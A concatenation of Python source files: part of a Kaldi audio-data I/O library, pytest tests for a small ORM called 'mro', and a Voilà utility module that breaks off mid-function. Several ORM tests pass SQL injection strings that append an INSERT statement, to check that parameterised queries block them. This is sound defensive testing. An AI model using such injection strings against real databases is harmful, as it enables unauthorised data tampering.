for key,vec in dict.iteritems():
kaldi_io.write_vec_int(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# dim,
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v.shape[0]))
# data,
for i in range(len(v)):
fd.write('\4'.encode()) # int32 type,
fd.write(struct.pack(np.dtype('int32').char, v[i])) # binary,
finally:
if fd is not file_or_fd : fd.close()
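# --- Illustrative round-trip sketch (not part of the original library). ---
# The file name and key below are placeholders; the helper is only defined
# here, never called on import.
def _demo_int_vec_roundtrip(path='demo_vec_int.ark'):
    vec = np.array([1, 2, 3], dtype='int32')
    with open(path, 'wb') as f:
        write_vec_int(f, vec, key='utt1')
    read_back = dict(read_vec_int_ark(path))
    assert (read_back['utt1'] == vec).all()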
#################################################
# Float vectors (confidences, ivectors, ...),
# Reading,
def read_vec_flt_scp(file_or_fd):
""" generator(key,mat) = read_vec_flt_scp(file_or_fd)
Returns generator of (key,vector) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,vec in kaldi_io.read_vec_flt_scp(file):
...
Read scp to a 'dictionary':
d = { key:vec for key,vec in kaldi_io.read_vec_flt_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
vec = read_vec_flt(rxfile)
yield key, vec
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt_ark(file_or_fd):
""" generator(key,vec) = read_vec_flt_ark(file_or_fd)
Create generator of (key,vector<float>) tuples, reading from an ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Read ark to a 'dictionary':
d = { u:d for u,d in kaldi_io.read_vec_flt_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
vec = read_vec_flt(fd)
yield key, vec
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_vec_flt(file_or_fd):
""" [flt-vec] = read_vec_flt(file_or_fd)
Read kaldi float vector, ascii or binary input,
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode()
if binary == '\0B': # binary flag
ans = _read_vec_flt_binary(fd)
else: # ascii,
arr = (binary + fd.readline().decode()).strip().split()
try:
arr.remove('['); arr.remove(']') # optionally
except ValueError:
pass
ans = np.array(arr, dtype=float)
if fd is not file_or_fd : fd.close() # cleanup
return ans
def _read_vec_flt_binary(fd):
header = fd.read(3).decode()
if header == 'FV ' : sample_size = 4 # floats
elif header == 'DV ' : sample_size = 8 # doubles
else : raise UnknownVectorHeader("The header contained '%s'" % header)
assert (sample_size > 0)
# Dimension,
assert (fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # vector dim
if vec_size == 0:
return np.array([], dtype='float32')
# Read whole vector,
buf = fd.read(vec_size * sample_size)
if sample_size == 4 : ans = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : ans = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
return ans
# Writing,
def write_vec_flt(file_or_fd, v, key=''):
""" write_vec_flt(f, v, key='')
Write a binary kaldi vector to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
v : the vector to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the vector.
Example of writing single vector:
kaldi_io.write_vec_flt(filename, vec)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,vec in dict.iteritems():
kaldi_io.write_vec_flt(f, vec, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if v.dtype == 'float32': fd.write('FV '.encode())
elif v.dtype == 'float64': fd.write('DV '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % v.dtype)
# Dim,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, v.shape[0])) # dim
# Data,
fd.write(v.tobytes())
finally:
if fd is not file_or_fd : fd.close()
#################################################
# Float matrices (features, transformations, ...),
# Reading,
def read_mat_scp(file_or_fd):
""" generator(key,mat) = read_mat_scp(file_or_fd)
Returns generator of (key,matrix) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,mat in kaldi_io.read_mat_scp(file):
...
Read scp to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
mat = read_mat(rxfile)
yield key, mat
finally:
if fd is not file_or_fd : fd.close()
def read_mat_ark(file_or_fd):
""" generator(key,mat) = read_mat_ark(file_or_fd)
Returns generator of (key,matrix) tuples, read from ark file/stream.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,mat in kaldi_io.read_mat_ark(file):
...
Read ark to a 'dictionary':
d = { key:mat for key,mat in kaldi_io.read_mat_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
mat = read_mat(fd)
yield key, mat
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_mat(file_or_fd):
""" [mat] = read_mat(file_or_fd)
Reads single kaldi matrix, supports ascii and binary.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
"""
fd = open_or_fd(file_or_fd)
try:
binary = fd.read(2).decode()
if binary == '\0B' :
mat = _read_mat_binary(fd)
else:
assert(binary == ' [')
mat = _read_mat_ascii(fd)
finally:
if fd is not file_or_fd: fd.close()
return mat
def _read_mat_binary(fd):
# Data type
header = fd.read(3).decode()
# 'CM', 'CM2', 'CM3' are possible values,
if header.startswith('CM'): return _read_compressed_mat(fd, header)
elif header == 'FM ': sample_size = 4 # floats
elif header == 'DM ': sample_size = 8 # doubles
else: raise UnknownMatrixHeader("The header contained '%s'" % header)
assert(sample_size > 0)
# Dimensions
s1, rows, s2, cols = np.frombuffer(fd.read(10), dtype='int8,int32,int8,int32', count=1)[0]
# Read whole matrix
buf = fd.read(rows * cols * sample_size)
if sample_size == 4 : vec = np.frombuffer(buf, dtype='float32')
elif sample_size == 8 : vec = np.frombuffer(buf, dtype='float64')
else : raise BadSampleSize
mat = np.reshape(vec,(rows,cols))
return mat
def _read_mat_ascii(fd):
rows = []
while 1:
line = fd.readline().decode()
if (len(line) == 0) : raise BadInputFormat # eof, should not happen!
if len(line.strip()) == 0 : continue # skip empty line
arr = line.strip().split()
if arr[-1] != ']':
rows.append(np.array(arr,dtype='float32')) # not last line
else:
rows.append(np.array(arr[:-1],dtype='float32')) # last line
mat = np.vstack(rows)
return mat
def _read_compressed_mat(fd, format):
""" Read a compressed matrix,
see: https://github.com/kaldi-asr/kaldi/blob/master/src/matrix/compressed-matrix.h
methods: CompressedMatrix::Read(...), CompressedMatrix::CopyToMat(...),
"""
assert(format == 'CM ') # The formats CM2, CM3 are not supported...
# Format of header 'struct',
global_header = np.dtype([('minvalue','float32'),('range','float32'),('num_rows','int32'),('num_cols','int32')]) # member '.format' is not written,
per_col_header = np.dtype([('percentile_0','uint16'),('percentile_25','uint16'),('percentile_75','uint16'),('percentile_100','uint16')])
# Read global header,
globmin, globrange, rows, cols = np.frombuffer(fd.read(16), dtype=global_header, count=1)[0]
# The data is structured as [Colheader, ..., Colheader, Data, Data, ...],
# i.e. 'cols' per-column headers (8 bytes each) followed by the uint8 data block.
col_headers = np.frombuffer(fd.read(cols*8), dtype=per_col_header, count=cols)
col_headers = np.array([np.array([x for x in y]) * globrange * 1.52590218966964e-05 + globmin for y in col_headers], dtype=np.float32)
data = np.reshape(np.frombuffer(fd.read(cols*rows), dtype='uint8', count=cols*rows), newshape=(cols,rows)) # stored as col-major,
mat = np.zeros((cols,rows), dtype='float32')
p0 = col_headers[:, 0].reshape(-1, 1)
p25 = col_headers[:, 1].reshape(-1, 1)
p75 = col_headers[:, 2].reshape(-1, 1)
p100 = col_headers[:, 3].reshape(-1, 1)
mask_0_64 = (data <= 64)
mask_193_255 = (data > 192)
mask_65_192 = (~(mask_0_64 | mask_193_255))
mat += (p0 + (p25 - p0) / 64. * data) * mask_0_64.astype(np.float32)
mat += (p25 + (p75 - p25) / 128. * (data - 64)) * mask_65_192.astype(np.float32)
mat += (p75 + (p100 - p75) / 63. * (data - 192)) * mask_193_255.astype(np.float32)
return mat.T # transpose! col-major -> row-major,
# Writing,
def write_mat(file_or_fd, m, key=''):
""" write_mat(f, m, key='')
Write a binary kaldi matrix to filename or stream. Supports 32bit and 64bit floats.
Arguments:
file_or_fd : filename or opened file descriptor for writing,
m : the matrix to be stored,
key (optional) : used for writing ark-file, the utterance-id gets written before the matrix.
Example of writing single matrix:
kaldi_io.write_mat(filename, mat)
Example of writing arkfile:
with open(ark_file,'w') as f:
for key,mat in dict.iteritems():
kaldi_io.write_mat(f, mat, key=key)
"""
fd = open_or_fd(file_or_fd, mode='wb')
if sys.version_info[0] == 3: assert(fd.mode == 'wb')
try:
if key != '' : fd.write((key+' ').encode("latin1")) # ark-files have keys (utterance-id),
fd.write('\0B'.encode()) # we write binary!
# Data-type,
if m.dtype == 'float32': fd.write('FM '.encode())
elif m.dtype == 'float64': fd.write('DM '.encode())
else: raise UnsupportedDataType("'%s', please use 'float32' or 'float64'" % m.dtype)
# Dims,
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[0])) # rows
fd.write('\04'.encode())
fd.write(struct.pack(np.dtype('uint32').char, m.shape[1])) # cols
# Data,
fd.write(m.tobytes())
finally:
if fd is not file_or_fd : fd.close()
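# --- Illustrative round-trip sketch (not part of the original library). ---
# The file name and key below are placeholders; the helper is only defined
# here, never called on import.
def _demo_mat_roundtrip(path='demo_mat.ark'):
    mat = np.arange(6, dtype='float32').reshape(2, 3)
    with open(path, 'wb') as f:
        write_mat(f, mat, key='utt1')
    read_back = dict(read_mat_ark(path))
    assert np.allclose(read_back['utt1'], mat)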
#################################################
# 'Posterior' kaldi type (posteriors, confusion network, nnet1 training targets, ...)
# Corresponds to: vector<vector<tuple<int,float> > >
# - outer vector: time axis
# - inner vector: records at the time
# - tuple: int = index, float = value
#
def read_cnet_ark(file_or_fd):
""" Alias of function 'read_post_ark()', 'cnet' = confusion network """
return read_post_ark(file_or_fd)
def read_post_rxspec(file_):
""" adaptor to read both 'ark:...' and 'scp:...' inputs of posteriors,
"""
if file_.startswith("ark:"):
return read_post_ark(file_)
elif file_.startswith("scp:"):
return read_post_scp(file_)
else:
print("unsupported intput type: %s" % file_)
print("it should begint with 'ark:' or 'scp:'")
sys.exit(1)
def read_post_scp(file_or_fd):
""" generator(key,post) = read_post_scp(file_or_fd)
Returns generator of (key,post) tuples, read according to kaldi scp.
file_or_fd : scp, gzipped scp, pipe or opened file descriptor.
Iterate the scp:
for key,post in kaldi_io.read_post_scp(file):
...
Read scp to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_scp(file) }
"""
fd = open_or_fd(file_or_fd)
try:
for line in fd:
(key,rxfile) = line.decode().split(' ')
post = read_post(rxfile)
yield key, post
finally:
if fd is not file_or_fd : fd.close()
def read_post_ark(file_or_fd):
""" generator(key,vec<vec<int,float>>) = read_post_ark(file)
Returns generator of (key,posterior) tuples, read from ark file.
file_or_fd : ark, gzipped ark, pipe or opened file descriptor.
Iterate the ark:
for key,post in kaldi_io.read_post_ark(file):
...
Read ark to a 'dictionary':
d = { key:post for key,post in kaldi_io.read_post_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
post = read_post(fd)
yield key, post
key = read_key(fd)
finally:
if fd is not file_or_fd: fd.close()
def read_post(file_or_fd):
""" [post] = read_post(file_or_fd)
Reads single kaldi 'Posterior' in binary format.
The 'Posterior' is the C++ type 'vector<vector<tuple<int,float> > >':
the outer vector is usually the time axis, the inner vector holds the
records at a given time, and each tuple is composed of an 'index' (integer)
and a 'float-value'. The 'float-value' can represent a probability
or any other numeric value.
Returns vector of vectors of tuples.
"""
fd = open_or_fd(file_or_fd)
ans=[]
binary = fd.read(2).decode(); assert(binary == '\0B'); # binary flag
assert(fd.read(1).decode() == '\4'); # int-size
outer_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
# Loop over 'outer-vector',
for i in range(outer_vec_size):
assert(fd.read(1).decode() == '\4'); # int-size
inner_vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of records for frame (or bin)
data = np.frombuffer(fd.read(inner_vec_size*10), dtype=[('size_idx','int8'),('idx','int32'),('size_post','int8'),('post','float32')], count=inner_vec_size)
assert(data[0]['size_idx'] == 4)
assert(data[0]['size_post'] == 4)
ans.append(data[['idx','post']].tolist())
if fd is not file_or_fd: fd.close()
return ans
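# --- Illustrative shape of the value returned above (not actual data): ---
# for a 2-frame posterior with two records in frame 0 and one in frame 1,
# read_post(...) would return something like
#   [[(31, 0.7), (42, 0.3)],
#    [(15, 1.0)]]
# i.e. a list over time of lists of (index, float-value) tuples.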
#################################################
# Kaldi Confusion Network bin begin/end times,
# (kaldi stores CNs time info separately from the Posterior).
#
def read_cntime_ark(file_or_fd):
""" generator(key,vec<tuple<float,float>>) = read_cntime_ark(file_or_fd)
Returns generator of (key,cntime) tuples, read from ark file.
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Iterate the ark:
for key,time in kaldi_io.read_cntime_ark(file):
...
Read ark to a 'dictionary':
d = { key:time for key,time in kaldi_io.read_cntime_ark(file) }
"""
fd = open_or_fd(file_or_fd)
try:
key = read_key(fd)
while key:
cntime = read_cntime(fd)
yield key, cntime
key = read_key(fd)
finally:
if fd is not file_or_fd : fd.close()
def read_cntime(file_or_fd):
""" [cntime] = read_cntime(file_or_fd)
Reads single kaldi 'Confusion Network time info', in binary format:
C++ type: vector<tuple<float,float> >.
(begin/end times of bins in the confusion network).
Binary layout is '<num-bins> <beg1> <end1> <beg2> <end2> ...'
file_or_fd : file, gzipped file, pipe or opened file descriptor.
Returns vector of tuples.
"""
fd = open_or_fd(file_or_fd)
binary = fd.read(2).decode(); assert(binary == '\0B'); # assuming it's binary
assert(fd.read(1).decode() == '\4'); # int-size
vec_size = np.frombuffer(fd.read(4), dtype='int32', count=1)[0] # number of frames (or bins)
data = np.frombuffer(fd.read(vec_size*10), dtype=[('size_beg','int8'),('t_beg','float32'),('size_end','int8'),('t_end','float32')], count=vec_size)
assert(data[0]['size_beg'] == 4)
assert(data[0]['size_end'] == 4)
ans = data[['t_beg','t_end']].tolist() # Return vector of tuples (t_beg,t_end),
if fd is not file_or_fd : fd.close()
return ans
#################################################
# Segments related,
#
# Segments as 'Bool vectors' can be handy,
# - for 'superposing' the segmentations,
# - for frame-selection in Speaker-ID experiments,
def read_segments_as_bool_vec(segments_file):
""" [ bool_vec ] = read_segments_as_bool_vec(segments_file)
Uses a kaldi 'segments' file for a single wav, format: '<utt> <rec> <t-beg> <t-end>'
- t-beg, t-end are in seconds,
- a frame rate of 100 frames/second is assumed,
"""
segs = np.loadtxt(segments_file, dtype='object,object,f,f', ndmin=1)
# Sanity checks,
assert(len(segs) > 0) # empty segmentation is an error,
assert(len(np.unique([rec[1] for rec in segs ])) == 1) # all segments must come from the same recording,
# Convert time to frame-indexes,
start = np.rint([100 * rec[2] for rec in segs]).astype(int)
end = np.rint([100 * rec[3] for rec in segs]).astype(int)
# Taken from 'read_lab_to_bool_vec', htk.py,
frms = np.repeat(np.r_[np.tile([False,True], len(end)), False],
np.r_[np.c_[start - np.r_[0, end[:-1]], end-start].flat, 0])
assert np.sum(end-start) == np.sum(frms)
return frms
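# --- Illustrative worked example (not part of the original library): ---
# a 'segments' file with two segments of one recording,
#   utt1 rec1 0.00 0.03
#   utt2 rec1 0.05 0.07
# maps, at 100 frames/second, to frames [0,3) and [5,7), so the returned
# bool vector is [T, T, T, F, F, T, T] (length 7 = last end frame).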
|
table_test.py
|
import pytest
import mro
import connection as con
from datetime import datetime, date
from threading import Thread, Event
class table1(mro.table.table):
column1 = mro.data_types.integer('column1', 0, not_null=False, is_updateable=True, get_value_on_insert = False, is_primary_key = False)
column2 = mro.data_types.varchar('column2', 1, 20, not_null=False, is_updateable=True, get_value_on_insert = False, is_primary_key = False)
column3 = mro.data_types.integer('column3', 1, not_null=False, is_updateable=True, get_value_on_insert = False, is_primary_key = False)
def __init__(self, **kwargs):
self.__dict__['column1'] = 1
self.__dict__['column2'] = None
self.__dict__['column3'] = None
for k, v in kwargs.items():
if not hasattr(self, k):
raise ValueError("{} does not have an attribute {}".format(self.__class__.__name__, k))
self.__dict__[k] = v
if not mro.table.disable_insert():
obj = super().insert(**kwargs)
for c in table1._get_value_on_insert_columns:
self.__dict__[c] = obj.__dict__[c]
def update(self, **kwargs):
primary_key_columns = table1._primary_key_columns
primary_key_column_values = [self.__dict__[c] for c in primary_key_columns]
super().update(primary_key_columns, primary_key_column_values, **kwargs)
table1._register()
@pytest.fixture
def connection_function(request):
connection = con.connect()
request.addfinalizer(mro.disconnect)
cursor = connection.cursor()
con.drop_tables()
cursor.execute("create table table1 (id serial primary key, created_date date not null default current_date, column1 integer default 1, column2 varchar(20), column3 integer, column4 float default 1.2, column5 bool default False, column6 oid default 999)")
cursor.execute("create table table2 (column1 varchar(20), column2 integer, column3 varchar(20))")
cursor.execute("create table table3 (created_datetime timestamp not null default current_timestamp, created_time time not null default current_time, column1 varchar(20) default 'ABC DEF', column2 integer, column3 varchar(20), column4 jsonb, column5 bool, column6 oid)")
cursor.execute("insert into table1 (column1, column2, column3, column6) values (%s,%s,%s,%s)", (1,'Hello World!', 2, 777))
cursor.execute("insert into table1 (column1, column2, column3) values (%s,%s,%s)", (2,'Hello World2!', 3))
cursor.execute("insert into table2 values (%s,%s,%s)", ('Hello World3!', 4, 'Hello World4!'))
connection.commit()
connection.close()
return lambda: con.connect()
@pytest.fixture
def connection_function_for_threadsafe_test(request):
connection = con.connect()
request.addfinalizer(mro.disconnect)
cursor = connection.cursor()
con.drop_tables()
cursor.execute("create table table1 (id serial primary key, created_date date not null default current_date, column1 integer default 1, column2 varchar(20), column3 integer, column4 float default 1.2, column5 bool default False, column6 oid default 999)")
cursor.execute("create table table2 (id serial primary key, created_date date not null default current_date, column1 integer default 1, column2 varchar(20), column3 integer, column4 float default 1.2, column5 bool default False, column6 oid default 999)")
for i in range(3000):
cursor.execute("insert into table1 (column1, column2, column3, column6) values (%s,%s,%s,%s)", (i,'Hello World!', 2, 777))
cursor.execute("insert into table2 (column1, column2, column3, column6) values (%s,%s,%s,%s)", (i, 'Hello World!', 2, 777))
connection.commit()
connection.close()
return lambda: con.connect()
class TestTable(object):
def test_table_reflection(self, connection_function):
mro.load_database(connection_function)
tables = mro.table1.select()
assert len(tables) == 2
assert isinstance(tables[0].created_date, date)
assert tables[0].column1 == 1
assert tables[0].column2 == 'Hello World!'
assert tables[0].column3 == 2
assert tables[0].column6 == 777
assert tables[1].column1 == 2
assert tables[1].column2 == 'Hello World2!'
assert tables[1].column3 == 3
tables = mro.table2.select()
assert len(tables) == 1
assert tables[0].column1 == 'Hello World3!'
assert tables[0].column2 == 4
assert tables[0].column3 == 'Hello World4!'
def test_table_select_filter(self, connection_function):
mro.load_database(connection_function)
tables = mro.table1.select('column1 = %d' % 2)
assert len(tables) == 1
assert tables[0].column1 == 2
assert tables[0].column2 == 'Hello World2!'
assert tables[0].column3 == 3
tables = mro.table2.select("column1 = '%d'" % 1)
assert len(tables) == 0
def test_table_select(self, connection_function):
mro.load_database(connection_function)
assert len(mro.table1.select()) == 2
assert len(mro.table1.select("column1=1")) == 1
def test_table_select_pyformat_syntax(self, connection_function):
mro.load_database(connection_function)
initial_tables = mro.table1.select()
injection_string = "1; insert into table1(column1, column2, column3) values(3,'Hello World3!',4); select * from table1"
# Check we throw an exception if the input variable contains an injection string
with pytest.raises(Exception):
mro.table1.select("column1 = %s;", injection_string)
# Check that the attempted injection did not manage to insert another row via select with user input
current_tables = mro.table1.select()
assert len(current_tables) == len(initial_tables)
# Check the positive case, that we can select using pyformat syntax
assert len(mro.table1.select("column1 = %s", 1)) == 1
def test_table_select_count(self, connection_function):
mro.load_database(connection_function)
assert mro.table1.select_count() == 2
assert mro.table1.select_count("column1=1") == 1
def test_table_select_count_pyformat_syntax(self, connection_function):
mro.load_database(connection_function)
injection_string = "1; insert into table1(column1, column2, column3) values(3,'Hello World3!',4); select count(*) from table1"
initial_table_count = mro.table1.select_count()
with pytest.raises(Exception):
mro.table1.select_count("column1 = %s;", injection_string)
# Check that the attempted injection did not manage to insert another row via select_count with user input
current_table_count = mro.table1.select_count()
assert current_table_count == initial_table_count
# Check the positive case, that we can select count with pyformat syntax
assert mro.table1.select_count("column1 = %s", 1) == 1
def test_table_select_one(self, connection_function):
mro.load_database(connection_function)
assert mro.table1.select_one("column1 = 1").column1 is 1
assert mro.table2.select_one().column2 is 4
def test_table_select_one_pyformat_syntax(self, connection_function):
mro.load_database(connection_function)
injection_string = "1; insert into table1(column1, column2, column3) values(3,'Hello World3!',4); select * from table1"
initial_table_count = mro.table1.select_count()
with pytest.raises(Exception):
mro.table1.select_one("column1 = %s;", injection_string)
# Check that the attempted injection did not manage to insert another row via select_one with user input
current_table_count = mro.table1.select_count()
assert current_table_count == initial_table_count
# Check the positive case, that we can select one using pyformat syntax
assert mro.table1.select_one("column1 = %s", 1).column1 == 1
def test_table_delete_filter(self, connection_function):
mro.load_database(connection_function)
table_count = mro.table1.select_count()
tables = mro.table1.select('column1 = %d' % 2)
assert len(tables) == 1
assert tables[0].column1 == 2
assert tables[0].column2 == 'Hello World2!'
assert tables[0].column3 == 3
mro.table1.delete('column1 = %d' % 2)
assert table_count - 1 == mro.table1.select_count()
def test_table_delete(self, connection_function):
mro.load_database(connection_function)
mro.table1.delete('column1 = 1')
assert mro.table1.select_count('column1 = 1') == 0
assert mro.table1.select_count() != 0
mro.table1.delete()
assert mro.table1.select_count() == 0
def test_table_delete_pyformat_syntax(self, connection_function):
mro.load_database(connection_function)
assert mro.table1.select_count("column1=1") is not 0
mro.table1.delete('column2 = %s',
"1; insert into table1(column1,column2,column3) values(4, 'row in on delete', 6);")
# Check nothing was deleted (the value didn't match the whole string) and that no new row was inserted
assert mro.table1.select_count("column1 = 1") != 0
assert mro.table1.select_count("column2 = 'row in on delete'") == 0
# Check the positive case, we can delete using the pyformat syntax
mro.table1.delete("column1=%s",1)
assert mro.table1.select_count("column1=1") is 0
def test_create_object(self, connection_function):
mro.load_database(connection_function)
table_count = mro.table1.select_count()
table = mro.table1(column1=3, column2='Hi!', column3=11, column6=10)
assert table.column1 == 3
assert table.column2 == 'Hi!'
assert table.column3 == 11
assert table.column6 == 10
table = mro.table1(column2 = 'Hi2!')
assert table.column1 == 1
assert table.column2 == 'Hi2!'
assert table.column3 is None
kwargs = {'column1': 5, 'column2': 'Hi3!', 'column3': 78, 'column6': 22}
table = mro.table1(**kwargs)
assert table.column1 == 5
assert table.column2 == 'Hi3!'
assert table.column3 == 78
assert table.column6 == 22
tables = mro.table1.select()
assert table_count + 3 == len(tables)
assert tables[4].column1 == 5
assert tables[4].column2 == 'Hi3!'
assert tables[4].column3 == 78
assert tables[4].column6 == 22
def test_insert_check_default_values(self, connection_function):
mro.load_database(connection_function)
table_count = mro.table1.select_count()
table = mro.table1(column1 = 3, column2 = 'Hi!')
assert table.column4 == 1.2
assert table.column5 is False
assert table.column6 == 999
table = mro.table1(column1 = 3, column2 = 'Hi!', column3 = 11, column4=5.7, column5=True, created_date = datetime.now().date(), column6=88)
assert table.column4 == 5.7
assert table.column5 is True
assert table.column6 == 88
tables = mro.table1.select()
for table in tables:
assert isinstance(table.id, int)
assert table.id is not None
assert isinstance(table.created_date, date)
assert table.created_date is not None
assert isinstance(table.column1, int)
assert table.column1 is not None
assert isinstance(table.column2, str)
assert table.column2 is not None
assert table.column3 is None or isinstance(table.column3, int)
assert isinstance(table.column5, bool)
assert isinstance(table.column6, int)
table = mro.table3(column3 = 'Hi56!', column4 = '{"data": 1}')
table = mro.table3.select_one("column3 = 'Hi56!'")
assert isinstance(table.column1, str)
assert table.column1 == 'ABC DEF'
assert isinstance(table.column3, str)
assert table.column3 is not None
assert isinstance(table.column4, str)
assert table.column4 is not None
assert table.column5 is None
assert table.column6 is None
def test_insert_many(self, connection_function):
mro.load_database(connection_function)
mro.table1.delete()
table = mro.table1.insert_many(
['column1', 'column2', 'column3'],
[
[1, 'Hi!', 7],
[2, 'Hi2!', 13],
[3, 'Hi3!', 21]
])
tables = mro.table1.select()
assert 3 == len(tables)
assert tables[0].column1 == 1
assert tables[0].column2 == 'Hi!'
assert tables[0].column3 == 7
assert tables[1].column1 == 2
assert tables[1].column2 == 'Hi2!'
assert tables[1].column3 == 13
assert tables[2].column1 == 3
assert tables[2].column2 == 'Hi3!'
assert tables[2].column3 == 21
def test_insert_with_only_primary_key_no_kwargs(self, connection_function):
mro.load_database(connection_function)
table_count = mro.table1()
def test_disable_insert_thread_safe(self, connection_function_for_threadsafe_test):
mro.load_database(connection_function_for_threadsafe_test)
closedown_event = Event()
thread1 = Thread(target=simple_select, args=(mro.table1.select, "thread1", closedown_event))
thread1.start()
thread2 = Thread(target=simple_select, args=(mro.table2.select, "thread2", closedown_event))
thread2.start()
thread3 = Thread(target=simple_select, args=(mro.table1.select, "thread3", closedown_event))
thread3.start()
thread1.join()
thread2.join()
thread3.join()
successful = True
if closedown_event.wait(0):
successful = False
assert successful
def simple_select(select_function, name, closedown_event):
count = 0
iterations = 10
log_every = 3
while count < iterations:
try:
if closedown_event.wait(0):
return
if count % log_every == 0:
print(f"{name} Iterated {count} times")
count = count + 1
tables = select_function()
except Exception as ex:
print(f"Exception in {name}: {str(ex)}")
closedown_event.set()
return
if __name__ == '__main__':
#pytest.main([__file__])
pytest.main([__file__ + '::TestTable::test_insert_with_only_primary_key_no_kwargs'])
|
utils.py
|
#############################################################################
# Copyright (c) 2018, Voilà Contributors #
# Copyright (c) 2018, QuantStack #
# #
# Distributed under the terms of the BSD 3-Clause License. #
# #
# The full license is in the file LICENSE, distributed with this software. #
#############################################################################
import asyncio
from functools import partial
import os
import threading
from enum import Enum
import websockets
import jinja2
from .static_file_handler import TemplateStaticFileHandler
class ENV_VARIABLE(str, Enum):
VOILA_PREHEAT = 'VOILA_PREHEAT'
VOILA_KERNEL_ID = 'VOILA_KERNEL_ID'
VOILA_BASE_URL = 'VOILA_BASE_URL'
VOILA_APP_IP = 'VOILA_APP_IP'
VOILA_APP_PORT = 'VOILA_APP_PORT'
VOILA_APP_PROTOCOL = 'VOILA_APP_PROTOCOL'
SERVER_NAME = 'SERVER_NAME'
SERVER_PORT = 'SERVER_PORT'
SCRIPT_NAME = 'SCRIPT_NAME'
PATH_INFO = 'PATH_INFO'
QUERY_STRING = 'QUERY_STRING'
SERVER_SOFTWARE = 'SERVER_SOFTWARE'
SERVER_PROTOCOL = 'SERVER_PROTOCOL'
def get_server_root_dir(settings):
# notebook >= 5.0.0 has this in the settings
if 'server_root_dir' in settings:
return settings['server_root_dir']
# This copies the logic added in the notebook in
# https://github.com/jupyter/notebook/pull/2234
contents_manager = settings['contents_manager']
root_dir = contents_manager.root_dir
home = os.path.expanduser('~')
if root_dir.startswith(home + os.path.sep):
# collapse $HOME to ~
root_dir = '~' + root_dir[len(home):]
return root_dir
async def _get_query_string(ws_url: str) -> str:
async with websockets.connect(ws_url) as websocket:
qs = await websocket.recv()
return qs
def get_query_string(url: str = None) -> str:
"""Helper function to pause the execution of notebook and wait for
the query string.
Args:
url (str, optional): Address from which to get the user query string; if it
is not provided, `voila` will figure it out from the environment variables.
Defaults to None.
Returns: The query string provided by `QueryStringSocketHandler`.
"""
preheat_mode = os.getenv(ENV_VARIABLE.VOILA_PREHEAT, 'False')
if preheat_mode == 'False':
return os.getenv(ENV_VARIABLE.QUERY_STRING)
query_string = None
if url is None:
protocol = os.getenv(ENV_VARIABLE.VOILA_APP_PROTOCOL, 'ws')
server_ip = os.getenv(ENV_VARIABLE.VOILA_APP_IP, '127.0.0.1')
server_port = os.getenv(ENV_VARIABLE.VOILA_APP_PORT, '8866')
base_url = os.getenv(ENV_VARIABLE.VOILA_BASE_URL, '/')
url = f'{protocol}://{server_ip}:{server_port}{base_url}voila/query'
kernel_id = os.getenv(ENV_VARIABLE.VOILA_KERNEL_ID)
ws_url = f'{url}/{kernel_id}'
def inner():
nonlocal query_string
loop = asyncio.new_event_loop()
query_string = loop.run_until_complete(_get_query_string(ws_url))
thread = threading.Thread(target=inner)
try:
thread.start()
thread.join()
except (KeyboardInterrupt, SystemExit):
asyncio.get_event_loop().stop()
return query_string
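# --- Illustrative usage (not part of the original module). ---
# Inside a preheated notebook cell one would typically call, e.g.:
#   qs = get_query_string()
#   params = urllib.parse.parse_qs(qs)  # stdlib parsing, shown only for illustration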
def make_url(template_name, base_url, path):
# similar to static_url, but does not assume the static prefix
settings = {
'static_url_prefix': f'{base_url}voila/templates/',
'static_path': None # not used in TemplateStaticFileHandler.get_absolute_path
}
return TemplateStaticFileHandler.make_static_url(settings, f'{template_name}/{path}')
def include_css(template_name, base_url, name):
code = f'<link rel="stylesheet" type="text/css" href="{make_url(template_name, base_url, name)}">'
return jinja2.Markup(code)
def include_js(template_name, base_url, name):
code = f'<script src="{make_url(template_name, base_url, name)}"></script>'
return jinja2.Markup(code)
def include_url(template_name, base_url, name):
